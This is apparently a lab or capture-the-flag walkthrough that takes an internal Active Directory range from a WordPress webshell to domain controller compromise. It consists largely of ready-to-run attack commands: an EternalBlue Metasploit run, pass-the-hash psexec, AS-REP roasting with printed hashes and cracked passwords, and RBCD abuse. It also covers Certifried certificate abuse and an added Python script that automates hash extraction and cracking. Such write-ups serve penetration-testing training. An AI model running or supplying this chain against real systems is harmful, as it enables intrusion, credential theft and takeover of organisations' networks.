Contents
flag1
flag2
flag3
flag4
flag1
fscan finds nothing.
Browsing to the host shows a web site.
Run dirsearch against it.
Visit ./wp-admin.
Log in with the weak credentials admin:123456.
Edit the theme files.
Insert a one-line PHP webshell into header.php.
Where header.php lives: https://tw.godaddy.com/help/change-the-header-in-wordpress-26441
Connect with AntSword to ./wp-content/themes/twentytwentyone/header.php (header.php is included on every front-end page load, so the shell fires on any request to the site; keep a copy of the original to restore it afterwards).
flag1 can be read directly.
flag2
Upload fscan and frp to /tmp, scan the internal network and build a tunnel.
./fscan -h 172.22.15.1/24 > ./result.txt
172.22.15.13 XR-DC01 (domain controller)
172.22.15.18 80 XR-CA ADCS
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.26 (this host)
172.22.15.35 XR-0687
Start with MS17-010 (EternalBlue) on .24. A bind payload is used because a reverse connection cannot come back through the socks proxy:
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit
hashdump to grab the hashes.
The msf shell is flaky, so move laterally with psexec straight away, passing the NT hash:
proxychains4 python psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
flag2 is readable there.
flag3
Visit the web app on .24.
Log in with the weak credentials admin:123456.
The admin backend has a template export.
From it, write out the domain usernames by hand:
lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
That screams AS-REP Roasting:
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
Two AS-REP hashes come back (accounts without Kerberos pre-authentication):
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc
Crack them with hashcat (mode 18200):
hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7' ./rockyou.txt
hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc' ./rockyou.txt
Cracked credentials:
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx
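Glue for the AS-REP roasting step above, added here as an example and not part of the original write-up: it pulls the `$krb5asrep$` lines out of what GetNPUsers prints, produces a hashcat `-m 18200` job over a hash file instead of pasting each hash on the command line, and maps `hashcat --show` output back to account names. The sample GetNPUsers and hashcat output embedded below is constructed and the hashes are truncated; a real enc-part is several hundred hex characters.

```python
# Added example (not the write-up's own code): GetNPUsers -> hashcat -> creds.
# Handles the etype-23 line format that impacket prints and hashcat -m 18200
# expects; AES (etype 17/18) AS-REP lines have a different layout and mode.
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional

# impacket prints: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-part>
# <user> can itself contain '@' when the usersfile held UPNs (as in this lab),
# so the user group is non-greedy and the realm group excludes '@' and ':'.
ASREP_RE = re.compile(
    r"\$krb5asrep\$(?P<etype>\d+)\$(?P<user>.+?)@(?P<realm>[^@:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)"
)


@dataclass(frozen=True)
class AsrepHash:
    etype: int
    user: str       # sAMAccountName, UPN suffix stripped
    realm: str
    checksum: str
    enc_part: str
    raw: str        # the hash exactly as hashcat wants it


def parse_asrep(line: str) -> Optional[AsrepHash]:
    """Parse one $krb5asrep$ line; return None for status lines or other etypes."""
    m = ASREP_RE.match(line.strip())
    if not m or int(m.group("etype")) != 23:
        return None
    return AsrepHash(
        etype=23,
        user=m.group("user").split("@", 1)[0],
        realm=m.group("realm"),
        checksum=m.group("checksum").lower(),
        enc_part=m.group("enc").lower(),
        raw=m.group(0),
    )


def extract_hashes(getnpusers_output: str) -> List[AsrepHash]:
    """Keep only roastable accounts; '[-]'/'[*]' status lines are dropped."""
    return [h for h in (parse_asrep(l) for l in getnpusers_output.splitlines()) if h]


def write_hashfile(hashes: List[AsrepHash], path: str) -> int:
    """One hash per line, the input form hashcat -m 18200 takes. Returns the count."""
    with open(path, "w", encoding="ascii") as f:
        for h in hashes:
            f.write(h.raw + "\n")
    return len(hashes)


def hashcat_command(hashfile: str, wordlist: str) -> List[str]:
    """argv for a straight wordlist attack; no per-hash shell quoting needed."""
    return ["hashcat", "-m", "18200", "-a", "0", hashfile, wordlist]


def parse_hashcat_show(show_output: str) -> Dict[str, str]:
    """Map `hashcat --show` lines (hash:password) back to sAMAccountName.

    The hash itself contains ':' so a naive split is wrong; the hash is matched
    structurally and everything after the following ':' is the password, which
    may itself contain ':'.
    """
    creds: Dict[str, str] = {}
    for line in show_output.splitlines():
        line = line.strip()
        m = ASREP_RE.match(line)
        if not m or not line[m.end():].startswith(":"):
            continue
        creds[m.group("user").split("@", 1)[0]] = line[m.end() + 1:]
    return creds


# Constructed sample of GetNPUsers -usersfile output (hashes truncated).
SAMPLE_GETNPUSERS_OUTPUT = """\
[-] User zhangyi@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:0123456789abcdef0123456789abcdef$00aa11bb22cc33dd44ee55ff
[-] User zhangli@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:fedcba9876543210fedcba9876543210$ff55ee44dd33cc22bb11aa00
"""

# Constructed sample of `hashcat -m 18200 asrep.txt rockyou.txt --show`;
# the third line is a made-up account whose password contains ':'.
SAMPLE_HASHCAT_SHOW = """\
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:0123456789abcdef0123456789abcdef$00aa11bb22cc33dd44ee55ff:winniethepooh
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:fedcba9876543210fedcba9876543210$ff55ee44dd33cc22bb11aa00:1qaz2wsx
$krb5asrep$23$zhangwei@xiaorang.lab@XIAORANG.LAB:00112233445566778899aabbccddeeff$0badc0de0badc0de0badc0de:p:ss
"""

if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_GETNPUSERS_OUTPUT)
    print(f"{len(hashes)} roastable account(s): {[h.user for h in hashes]}")
    print(shlex.join(hashcat_command("asrep.txt", "rockyou.txt")))
    for user, pw in parse_hashcat_show(SAMPLE_HASHCAT_SHOW).items():
        print(f"{user}@xiaorang.lab / {pw}")
```

In practice run `write_hashfile(extract_hashes(open("npusers.txt").read()), "asrep.txt")` on the captured GetNPUsers output, crack `asrep.txt`, then feed `hashcat --show` to `parse_hashcat_show` to get the user/password pairs for the next step.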
Run BloodHound collection:
proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
lixiuying has GenericWrite over XR-0687.
Remember to add the host to /etc/hosts first, since the Kerberos steps below need the FQDN to resolve:
172.22.15.35 XR-0687.xiaorang.lab
Go for RBCD: create a machine account (the default MachineAccountQuota allows it), use GenericWrite to point XR-0687's msDS-AllowedToActOnBehalfOfOtherIdentity at it, then S4U2Self/S4U2Proxy for a CIFS ticket as Administrator. This only works if the impersonated account is not marked "sensitive and cannot be delegated" or in Protected Users:
proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass '0x401@admin'
proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'
proxychains4 impacket-getST xiaorang.lab/'HACK$':'0x401@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
export KRB5CCNAME=Administrator.ccache
proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
flag3 is readable there.
flag4
Next, ADCS: this is CVE-2022-26923 (Certifried).
Create a machine account whose dNSHostName is the DC's FQDN, then request a certificate from the Machine template; the CA issues it for that dNSHostName, so the certificate identifies XR-DC01$:
proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
Then use this tool:
https://github.com/AlmondOffSec/PassTheCert/tree/main/Python
It authenticates to LDAP with the certificate (Schannel), so the pfx from above is split into cert and key and used to configure RBCD on the DC towards the HACK$ created earlier:
certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'
Get the ticket and import it:
proxychains4 impacket-getST xiaorang.lab/HACK\$:0x401@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
psexec straight in with no password:
proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk
flag4 is readable there.